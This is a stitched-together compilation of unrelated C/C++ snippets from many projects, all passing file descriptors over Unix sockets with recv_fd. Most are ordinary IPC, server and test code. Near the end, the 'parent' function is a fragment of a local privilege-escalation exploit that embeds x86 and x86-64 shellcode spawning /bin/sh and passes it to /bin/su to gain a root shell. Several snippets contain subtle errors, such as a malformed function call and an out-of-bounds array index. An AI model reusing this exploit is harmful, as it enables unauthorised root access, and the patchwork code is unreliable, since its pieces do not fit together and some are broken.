bool
ptytty_proxy::get ()
{
NEED_TOKEN;
command cmd;
cmd.type = command::get;
write (sock_fd, &cmd, sizeof (cmd));
if (read (sock_fd, &id, sizeof (id)) != sizeof (id))
ptytty_fatal ("protocol error while creating pty using helper process, aborting.\n");
if (!id)
{
GIVE_TOKEN;
return false;
}
if ((pty = recv_fd (sock_fd)) < 0
|| (tty = recv_fd (sock_fd)) < 0)
ptytty_fatal ("protocol error while reading pty/tty fds from helper process, aborting.\n");
GIVE_TOKEN;
return true;
}
int main (int argc, char *argv[])
{
struct sockaddr_un addr;
int fd;
if ( (fd = socket(AF_UNIX, SOCK_STREAM, 0)) == -1) {
perror("socket error");
exit(-1);
}
memset(&addr, 0, sizeof(addr));
addr.sun_family = AF_UNIX;
addr.sun_path[0] = '\0';
strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path)-1);
/* calculate the length of our addrlen, for some reason this isn't simply
* sizeof(addr), TODO: learn why, i suspect it has something to do with sun_path
* being a char[108]
*/
int len = offsetof(struct sockaddr_un, sun_path) + 1 + strlen(&addr.sun_path[1]);
if (connect(fd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
perror("connect error");
exit(-1);
}
printf("[+] connected. receiving comms\n");
int in = recv_fd(fd);
if( in == -1 ) {
perror("receiving other stdin failed");
exit(1);
}
int out = recv_fd(fd);
if( out == -1 ) {
perror("receiving other stdout failed");
exit(1);
}
printf("[<+] comms received\n");
char buf[wizard];
int r = read(in, buf, wizard);
if( r >= 0 && r <= wizard )
buf[r] = '\0';
printf("'%s'\n", buf);
dprintf(out, "Wizard received. Cheers!\n");
close(fd);
return 0;
}
int main(){
int pipefd[2];
int fd_to_pass=0;
//创建父子进程之间的管道,文件描述符pipefd[0]和pipefd[1]都是UNIX域套接字
int ret=socketpair(PF_UNIX,SOCK_STREAM,0,pipefd);
assert(ret!=-1);
pid_t pid=fork();
assert(pid>=0);
if(pid==0){
close(pipefd[0]);
fd_to_pass=open("select.c",O_RDONLY);
send_fd(pipefd[1],fd_to_pass);
close(fd_to_pass);
exit(EXIT_SUCCESS);
}
else{
sleep(3);
close(pipefd[1]);
fd_to_pass=recv_fd(pipefd[0]);
char buf[1024];
memset(buf,0,1024);
read(fd_to_pass,buf,1024);
printf("I got fd %d and data %s\n",fd_to_pass,buf);
close(fd_to_pass);
}
}
int main(int argc,char* argv[])
{
if(argc != 2)
{
printf("error args\n");
return -1;
}
int fds[2];
int ret=socketpair(AF_LOCAL,SOCK_STREAM,0,fds);
if(-1==ret)
{
perror("socketpair");
return -1;
}
if(!fork())
{
close(fds[1]);
int fd;
recv_fd(fds[0],&fd);
printf("i am child,fd is %d\n",fd);
char buf[10]={0};
read(fd,buf,sizeof(buf));
printf("the buf is %s\n",buf);
return 0;
}else{
close(fds[0]);
int fd=open(argv[1],O_RDWR);
printf("i am parent,fd is %d\n",fd);
send_fd(fds[1],fd); //把fd这个描述符 写到fds[1]写描述符中
wait(NULL);
return 0;
}
}
void child_main(int fd){
int fd_client;
int flag=1;
recv_fd(fd,&fd_client);
child_handle(int fd_client);
write(fd_client,&flag,4);
}
FILE *LightProcess::LightPopenImpl(const char *cmd, const char *type,
const char *cwd) {
int id = GetId();
Lock lock(g_procs[id].m_procMutex);
fprintf(g_procs[id].m_fout, "popen\n%s\n%s\n%s\n", type, cmd, cwd);
fflush(g_procs[id].m_fout);
char buf[BUFFER_SIZE];
read_buf(g_procs[id].m_fin, buf);
if (strncmp(buf, "error", 5) == 0) {
return nullptr;
}
int64_t fptr = 0;
read_buf(g_procs[id].m_fin, buf);
sscanf(buf, "%" PRId64, &fptr);
if (!fptr) {
Logger::Error("Light process failed to return the file pointer.");
return nullptr;
}
int fd = recv_fd(g_procs[id].m_afdt_fd);
if (fd < 0) {
Logger::Error("Light process failed to send the file descriptor.");
return nullptr;
}
FILE *f = fdopen(fd, type);
g_procs[id].m_popenMap[(int64_t)f] = fptr;
return f;
}
FILE *LightProcess::LightPopenImpl(const char *cmd, const char *type,
const char *cwd) {
int id = GetId();
Lock lock(g_procs[id].m_procMutex);
auto fout = g_procs[id].m_afdt_fd;
lwp_write(fout, "popen");
lwp_write(fout, type);
lwp_write(fout, cmd);
lwp_write(fout, cwd ? cwd : "");
std::string buf;
auto fin = g_procs[id].m_afdt_fd;
lwp_read(fin, buf);
if (buf == "error") {
return nullptr;
}
int64_t fptr = 0;
lwp_read_int64(fin, fptr);
if (!fptr) {
Logger::Error("Light process failed to return the file pointer.");
return nullptr;
}
int fd = recv_fd(fin);
if (fd < 0) {
Logger::Error("Light process failed to send the file descriptor.");
return nullptr;
}
FILE *f = fdopen(fd, type);
g_procs[id].m_popenMap[(int64_t)f] = fptr;
return f;
}
int on_channel(int epoll_fd, int fd)
{
channel ch;
if(recv_fd(fd, &ch) == L_HTTP_FAIL) {
printf("receive fd fail\n");
return L_HTTP_FAIL;
}
switch(ch.cmd) {
case HTTP_COMMAND_TRANS_FD:
return add_connection(epoll_fd, ch.fd);
case HTTP_COMMAND_RESTART:
break;
case HTTP_COMMAND_EXIT:
syslog(LOG_INFO, "proc:%d receive shutdown cmd", getpid());
worker_shutdown(epoll_fd);
break;
default:
printf("unknown cmd type\n");
return L_HTTP_FAIL;
}
return L_HTTP_SUCCESS;
}
/*
* Open the file by sending the "name" and "oflag" to the
* connection server and reading a file descriptor back.
*/
int csopen(char *name, int oflag)
{
int len;
char buf[12];
struct iovec iov[3];
static int csfd = -1;
if (csfd < 0) { /* open connection to conn server */
if ((csfd = cli_conn(CS_OPEN)) < 0) {
err_ret("cli_conn error");
return(-1);
}
}
sprintf(buf, " %d", oflag); /* oflag to ascii */
iov[0].iov_base = CL_OPEN " "; /* string concatenation */
iov[0].iov_len = strlen(CL_OPEN) + 1;
iov[1].iov_base = name;
iov[1].iov_len = strlen(name);
iov[2].iov_base = buf;
iov[2].iov_len = strlen(buf) + 1; /* null always send */
len = iov[0].iov_len + iov[1].iov_len + iov[2].iov_len;
if (writev(csfd, &iov[0], 3) != len) {
err_ret("writev error");
return(-1);
}
/* read back descriptor; returned errors handled by write() */
return(recv_fd(csfd, write));
}
static int read_iov_element(int fd, struct iovec *iov, int *temp_fd, int *temp_fd_count)
{
int read_bytes = 0;
while (1) {
if (temp_fd)
read_bytes = recv_fd(fd, temp_fd, temp_fd_count, iov, 1);
else
read_bytes = readv(fd, iov, 1);
if (read_bytes == -1) {
if (errno == EINTR)
continue;
OT_LOG(LOG_ERR, "read error");
return -1;
} else if (read_bytes == 0) {
OT_LOG(LOG_ERR, "read error");
errno = EPIPE;
return -1;
}
break;
}
return read_bytes;
}
int procmounter_service_ipc_server(int socket) {
int dir;
int type;
int err = 0;
ucred creds;
get_local_socket_credentials(socket,&creds);
dir = recv_fd(socket);
if (dir < 0 && !err) {
err = errno;
}
if(read(socket,&type,sizeof(type)) != sizeof(type) && !err) {
err = errno;
}
int ret = procmount_diy(dir,type,creds);
if(ret) {
err = errno;
}
close(dir);
if(write(socket,&err,sizeof(err)) != sizeof(err) && !err) {
err = errno;
}
return err;
}
static int dump_pages_init()
{
fd_pages = recv_fd(tsock);
if (fd_pages < 0)
return fd_pages;
return 0;
}
/*
* open the file by sending the "name" and "oflag" to the
* connection server and reading a file descriptor back.
*/
int csopen(char *name, int oflag)
{
pid_t pid;
int len;
char buf[10];
struct iovec iov[3];
static int fd[2] = { -1, -1 };
if (fd[0] < 0) { /* fork/exec our open server first time */
/*
* fd_pipe() is defined in figure 17-2.c
*/
if (fd_pipe(fd) < 0) {
err_ret("fd_pipe error");
return -1;
}
if ((pid = fork()) < 0) {
err_ret("fork error");
return -1;
} else if (pid == 0) { /* child */
close(fd[0]);
if (fd[1] != STDIN_FILENO &&
dup2(fd[1], STDIN_FILENO) != STDIN_FILENO)
err_sys("dup2 error to stdin");
if (fd[1] != STDOUT_FILENO &&
dup2(fd[1], STDOUT_FILENO) != STDOUT_FILENO)
err_sys("dup2 error to stdout");
/*
* exec family returns only if error
*/
if (execl("./opend", "opend", (char *)0) < 0)
err_sys("execl error");
}
/* parent */
close(fd[1]);
}
sprintf(buf, " %d", oflag); /* oflag to ascii */
iov[0].iov_base = CL_OPEN " "; /* string concatenation */
iov[0].iov_len = strlen(CL_OPEN) + 1;
iov[1].iov_base = name;
iov[1].iov_len = strlen(name);
iov[2].iov_base = buf;
iov[2].iov_len = strlen(buf) + 1; /* +1 for null at end of buf */
len = iov[0].iov_len + iov[1].iov_len + iov[2].iov_len;
if (writev(fd[0], &iov[0], 3) != len) {
err_ret("writev error");
return -1;
}
/*
* read descriptor, returned errors handled by write()
* recv_fd() is defined in 17-14.c
*/
return (recv_fd(fd[0], write));
}
pid_t do_proc_open_helper(int afdt_fd) {
std::string cmd, cwd;
std::vector<std::string> env;
std::vector<int> pvals;
lwp_read(afdt_fd, cmd, cwd, env, pvals);
std::vector<int> pkeys;
for (int i = 0; i < pvals.size(); i++) {
int fd = recv_fd(afdt_fd);
if (fd < 0) {
lwp_write(afdt_fd, "error", (int32_t)EPROTO);
close_fds(pkeys);
return -1;
}
pkeys.push_back(fd);
}
// indicate error if an empty command was received
if (cmd.length() == 0) {
lwp_write(afdt_fd, "error", (int32_t)ENOENT);
return -1;
}
// now ready to start the child process
pid_t child = fork();
if (child == 0) {
mprotect_1g_pages(PROT_READ);
Process::OOMScoreAdj(1000);
for (int i = 0; i < pvals.size(); i++) {
dup2(pkeys[i], pvals[i]);
}
if (!cwd.empty() && chdir(cwd.c_str())) {
// non-zero for error
// chdir failed, the working directory remains unchanged
}
if (!env.empty()) {
char **envp = build_envp(env);
execle("/bin/sh", "sh", "-c", cmd.c_str(), nullptr, envp);
free(envp);
} else {
execl("/bin/sh", "sh", "-c", cmd.c_str(), nullptr);
}
_Exit(HPHP_EXIT_FAILURE);
}
if (child > 0) {
// successfully created the child process
lwp_write(afdt_fd, "success", child);
} else {
// failed creating the child process
lwp_write(afdt_fd, "error", errno);
}
close_fds(pkeys);
return child;
}
int main(int argc, char **argv)
{
int sk[2], p[2];
#define MSG "HELLO"
char buf[8]; /* bigger than the MSG to check boundaries */
test_init(argc, argv);
if (socketpair(PF_UNIX, SOCK_DGRAM, 0, sk) < 0) {
pr_perror("Can't make unix pair");
exit(1);
}
if (pipe(p) < 0) {
pr_perror("Can't make pipe");
exit(1);
}
if (send_fd(sk[0], p[0], p[1]) < 0) {
pr_perror("Can't send descriptor");
exit(1);
}
close(p[0]);
close(p[1]);
p[0] = p[1] = -1;
test_daemon();
test_waitsig();
if (recv_fd(sk[1], &p[0], &p[1]) < 0) {
fail("Can't recv pipes back");
goto out;
}
if (write(p[1], MSG, sizeof(MSG)) != sizeof(MSG)) {
fail("Pipe write-broken");
goto out;
}
if (read(p[0], buf, sizeof(buf)) != sizeof(MSG)) {
fail("Pipe read-broken");
goto out;
}
if (strcmp(buf, MSG)) {
buf[sizeof(buf) - 1] = '\0';
fail("Pipe read-broken (%s)", buf);
goto out;
}
pass();
out:
return 0;
}
void child_handle(int fds)
{
int flag=1;
int newfd=-1;
while(1)
{
recv_fd(fds,&newfd);
recv_request(newfd);
write(fds,&flag,4);
}
}
int main(int argc, char const *argv[])
{
char msgbuf[10];
struct sockaddr_un address;
int socket_fd, connection_fd;
socklen_t address_length;
pid_t child;
socket_fd = socket(PF_UNIX, SOCK_STREAM, 0);
if(socket_fd < 0)
{
printf("socket() failed\n");
return 1;
}
unlink("./demo_socket");
/* start with a clean address structure */
memset(&address, 0, sizeof(struct sockaddr_un));
address.sun_family = AF_UNIX;
snprintf(address.sun_path, sizeof(address.sun_path)-1, "./demo_socket");
if(bind(socket_fd, (struct sockaddr *) &address, sizeof(struct sockaddr_un)) != 0)
{
printf("bind() failed\n");
return 1;
}
if(listen(socket_fd, 5) != 0)
{
printf("listen() failed\n");
return 1;
}
while((connection_fd = accept(socket_fd, (struct sockaddr *) &address,&address_length)) > -1)
{
//connection_handler(connection_fd);
int fd_to_recv;
fd_to_recv = recv_fd(connection_fd ,&errcheckfunc);
if(read(fd_to_recv,msgbuf,5) < 0)
printf("message read failed");
printf("message received:%s\n",msgbuf);
close(connection_fd);
}
close(socket_fd);
unlink("./demo_socket");
return 0;
}
static PyObject* py_recv_fd(PyObject *self, PyObject *args)
{
int sock, fd;
if (!PyArg_ParseTuple(args, "i:recv_fd", &sock))
return NULL;
//recv_fd(&fd, sock);
fd = recv_fd(sock);
return Py_BuildValue("i", fd);
}
static int spawn_child(struct scgi_server *server, int conn)
{
int flag = 1;
int fd[2]; /* parent, child */
char magic = '1';
if (socketpair(AF_UNIX, SOCK_STREAM, 0, fd) < 0) {
return -1;
}
/* make child fd non-blocking */
if ((flag = fcntl(fd[1], F_GETFL, 0)) < 0 ||
fcntl(fd[1], F_SETFL, flag | O_NONBLOCK) < 0) {
return -1;
}
pid_t pid = fork();
if (pid == 0) {
close(fd[1]);
/* in the midst of handling a request,
close the connection in the child
*/
if (conn != -1)
close(conn);
if (server->handler->child_init_hook)
server->handler->child_init_hook();
/* serving connection */
while (1) {
if (write(fd[0], &magic, 1) < 0)
die("write magic byte error");
conn = recv_fd(fd[0]);
if (conn == -1)
die("recv_fd error");
server->handler->handle_connection(conn);
}
exit(0);
} else if (pid > 0) {
close(fd[0]);
add_child(&server->children, pid, fd[1]);
} else {
perror("fork failed");
return -1;
}
return 0;
}
int csopen(char *name, int oflag)
{
pid_t pid;
int len;
char buf[10];
struct iovec iov[3];
static int fd[2] = {-1, -1};
if (fd[0] < 0) { /* fork/exec our open server first time */
if (s_pipe(fd) < 0) {
perror("s_pipe error\n");
exit(1);
}
if ((pid = fork()) < 0) {
perror("fork error\n");
exit(1);
} else if (pid == 0) { /* child */
close(fd[0]);
if (fd[1] != STDIN_FILENO) {
if (dup2(fd[1], STDIN_FILENO) != STDIN_FILENO) {
perror("dup2 error to stdin\n");
exit(1);
}
}
if (fd[1] != STDOUT_FILENO) {
if (dup2(fd[2], STDOUT_FILENO) != STDOUT_FILENO) {
perror("dup2 error to stdout\n");
exit(1);
}
}
if (execl("./opend", "opend", NULL) < 0) {
perror("execl error\n");
exit(1);
}
}
close(fd[1]); /* parenet */
}
sprintf(buf, " %d", oflag); /* oflag to ascii */
iov[0].iov_base = CL_OPEN " ";
iov[0].iov_len = strlen(CL_OPEN) + 1;
iov[1].iov_base = name;
iov[1].iov_len = strlen(name);
iov[2].iov_base = buf;
iov[2].iov_len = strlen(buf) + 1; /* +1 for null at end of buf */
len = iov[0].iov_len + iov[1].iov_len + iov[2].iov_len;
if (writev(fd[0], &iov[0], 3) != len) {
perror("writev error\n");
exit(1);
}
/* read descriptor, returned errors handled by write() */
return(recv_fd(fd[0], write));
}
static void
parent()
{
int nr_observed_descheds = 0;
child_counter = recv_fd(parent_socket, &child_counter_fdno);
waitpid(p, NULL, 0);
if (ptrace(PTRACE_SETOPTIONS, p, 0, (void*)PTRACE_O_TRACESYSGOOD))
err(1, "ptrace(SETOPTIONS)");
while (1) {
int status;
debug("%d continue", p);
ptrace(PTRACE_CONT, p, 0, 0);
waitpid(p, &status, 0);
if (!dump_status(p, status)) {
break;
}
if (WIFSTOPPED(status) && SIGIO == WSTOPSIG(status)) {
uint64_t nr_desched;
if (sizeof(nr_desched) != read(child_counter, &nr_desched,
sizeof(nr_desched)))
err(1, "read(child_counter)");
disable_counter(child_counter);
++nr_observed_descheds;
debug(" desched %llu; observed %d",
nr_desched, nr_observed_descheds);
dump_siginfo_regs(" at first SIGIO: ", p, status);
debug("skip SIGIO:");
ptrace(PTRACE_CONT, p, 0, 0);
waitpid(p, &status, 0);
assert(WIFSTOPPED(status) && SIGIO == WSTOPSIG(status));
dump_siginfo_regs(" after: ", p, status);
debug("\nsyscall:");
ptrace(PTRACE_SYSCALL, p, 0, 0);
waitpid(p, &status, 0);
dump_siginfo_regs(" after: ", p, status);
debug("\nfinish syscall:");
ptrace(PTRACE_SYSCALL, p, 0, 0);
waitpid(p, &status, 0);
dump_siginfo_regs(" after: ", p, status);
}
}
printf("child finished; observed %d descheds\n", nr_observed_descheds);
}
void child_handle(int fdr)
{
int fd;
int flag=1;
while(1)
{
recv_fd(fdr,&fd); // 如果父进程没有发过来,就在这里睡觉
send_file(fd); // 发送完文件内容
write(fdr,&flag,4); //发送1给主进程
}
}
void child_handle(int fdr)
{
int fd;
int flag=1;
while(1)
{
recv_fd(fdr,&fd);//如果父进程没有发生描述符过来,就在这里睡觉
send_file(fd);
write(fdr,&flag,4);
}
}
static int parasite_set_logfd()
{
int ret;
ret = recv_fd(tsock);
if (ret >= 0) {
logfd = ret;
ret = 0;
}
return ret;
}
int main(int argc, char *argv[]) {
int sock_fd = 0;
int file_fd;
char *ptr = "now write data to file\n";
char buf[129];
memset(buf, '\0', 128);
sock_fd = create_local_sock(SOCK_FILE);
recv_fd(sock_fd, &file_fd, buf, 128);
write(file_fd, ptr, strlen(ptr));
printf("recv message:%s\n", buf);
unlink(SOCK_FILE);
}
int main(){
struct sockaddr_un userv_addr,local,remote;
int usfd;
usfd = socket(AF_UNIX,SOCK_STREAM,0);
bzero((struct sockaddr_un*)&userv_addr,sizeof(userv_addr));
userv_addr.sun_family = AF_UNIX;
char socks[15];
sprintf(socks,"%s","skservcs");
strcpy(userv_addr.sun_path,socks);
int len = strlen(userv_addr.sun_path) + sizeof(userv_addr.sun_family);
if(connect(usfd,(struct sockaddr*)&userv_addr,len)<0){
printf("connect error!!\n");
exit(0);
}
printf("connected to Multiplex C\n");
int csfd= socket (AF_UNIX,SOCK_STREAM,0);
bzero((struct sockaddr_un*)&local,sizeof(local));
local.sun_family = AF_UNIX;
bzero(socks,15);
sprintf(socks,"%s","sksep");
strcpy(local.sun_path,socks);
unlink(local.sun_path);
len = strlen(local.sun_path) + sizeof(local.sun_family);
if(bind(csfd,(struct sockaddr*)&local,sizeof(local))<0){
printf("bind error!!\n");
exit(0);
}
int cllen=0;
listen(csfd,5);
pthread_t pd;
pthread_create(&pd,NULL,serv,(void*)&cllen);
printf("please start Multiplex E\n");
int x =0;
int ncsfd = accept(csfd,(struct sockaddr*)&remote,&x);
if(ncsfd <0){
perror("accpet error!!\n");
exit(0);
}
printf("connected to Multiplex E\n");
while(1){
int sfd = recv_fd(usfd);
printf("client recieved");
if(l>=1){
printf("Transferring client\n");
send_fd(ncsfd,sfd);
}
else
{
fds[l++]=sfd;
printf("servicing the client\n");
}
}
}
void child_main(int fd_read)
{
int fd_client;
// char flag = 1;
while(1)
{
recv_fd(fd_read, &fd_client);
handle(fd_client);
// write(fd_read, &flag, sizeof(flag));
return ;
}
}
int parent(unsigned long address)
{
int sockets[2];
printf("[+] Opening socketpair.\n");
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
perror("[-] socketpair");
return 1;
}
if (fork()) {
printf("[+] Waiting for transferred fd in parent.\n");
int fd = recv_fd(sockets[1]);
printf("[+] Received fd at %d.\n", fd);
if (fd < 0) {
perror("[-] recv_fd");
return 1;
}
printf("[+] Assigning fd %d to stderr.\n", fd);
dup2(2, 15);
dup2(fd, 2);
unsigned long offset = address - su_padding();
printf("[+] Seeking to offset 0x%lx.\n", offset);
lseek64(fd, offset, SEEK_SET);
#if defined(__i386__)
// See shellcode-32.s in this package for the source.
char shellcode[] =
"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
"\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
"\x80";
#elif defined(__x86_64__)
// See shellcode-64.s in this package for the source.
char shellcode[] =
"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
"\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
"\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
"\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
"\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
printf("[+] Executing su with shellcode.\n");
execl("/bin/su", "su", shellcode, NULL);
} else {
char sock[32];
sprintf(sock, "%d", sockets[0]);
printf("[+] Executing child from child fork.\n");
execl("/proc/self/exe", prog_name, "-c", sock, NULL);
}
return 0;
}
static int parasite_cfg_log(struct parasite_log_args *args)
{
int ret;
ret = recv_fd(tsock);
if (ret >= 0) {
log_set_fd(ret);
log_set_loglevel(args->log_level);
ret = 0;
}
return ret;
}
/* SIGURG handler (primary reconnect) */
static void afp_dsi_transfer_session(int sig _U_)
{
uint16_t dsiID;
int socket;
DSI *dsi = (DSI *)AFPobj->handle;
LOG(log_debug, logtype_afpd, "afp_dsi_transfer_session: got SIGURG, trying to receive session");
if (readt(AFPobj->ipc_fd, &dsiID, 2, 0, 2) != 2) {
LOG(log_error, logtype_afpd, "afp_dsi_transfer_session: couldn't receive DSI id, goodbye");
afp_dsi_close(AFPobj);
exit(EXITERR_SYS);
}
if ((socket = recv_fd(AFPobj->ipc_fd, 1)) == -1) {
LOG(log_error, logtype_afpd, "afp_dsi_transfer_session: couldn't receive session fd, goodbye");
afp_dsi_close(AFPobj);
exit(EXITERR_SYS);
}
LOG(log_debug, logtype_afpd, "afp_dsi_transfer_session: received socket fd: %i", socket);
dsi->proto_close(dsi);
dsi->socket = socket;
dsi->flags = DSI_RECONSOCKET;
dsi->datalen = 0;
dsi->eof = dsi->start = dsi->buffer;
dsi->in_write = 0;
dsi->header.dsi_requestID = dsiID;
dsi->header.dsi_command = DSIFUNC_CMD;
/*
* The session transfer happens in the middle of FPDisconnect old session, thus we
* have to send the reply now.
*/
if (!dsi_cmdreply(dsi, AFP_OK)) {
LOG(log_error, logtype_afpd, "dsi_cmdreply: %s", strerror(errno) );
afp_dsi_close(AFPobj);
exit(EXITERR_CLNT);
}
LOG(log_note, logtype_afpd, "afp_dsi_transfer_session: succesfull primary reconnect");
/*
* Now returning from this signal handler return to dsi_receive which should start
* reading/continuing from the connected socket that was passed via the parent from
* another session. The parent will terminate that session.
*/
siglongjmp(recon_jmp, 1);
}
